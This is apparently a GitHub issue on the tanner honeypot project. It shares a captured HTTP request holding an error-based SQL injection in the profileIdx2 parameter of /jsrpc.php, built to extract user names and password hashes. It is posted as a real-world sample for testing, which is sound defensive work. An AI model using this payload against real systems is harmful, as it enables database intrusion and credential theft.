tanner
tanner copied to clipboard
SQL injections sample
INFO[0233] [http ] POST /jsrpc.php HTTP/1.1
Host: 163.172.168.4
content-type: application/x-www-form-urlencoded
connection: keep-alive
accept-encoding: gzip, deflate
accept: */*
user-agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
content-length: 491
action=showlatest&filter=&filter_task=&groupid=&hostid=0&mark_color=1&method=screen.get&mode=2&pageFile=1&profileIdx=1&profileIdx2=%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C%28select+concat%28name%2C0x3a%2Cpasswd%29+from++users+limit+0%2C1%29%2C0x7e%29%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information_schema.tables+group+by+x%29a%29&resourcetype=16&screenid=&type=9&updateProfile=1
@glaslos please explain a bit.
Seen this SQL injection in the wild (profileIdx2=
parameter`). Thought it might be useful for testing.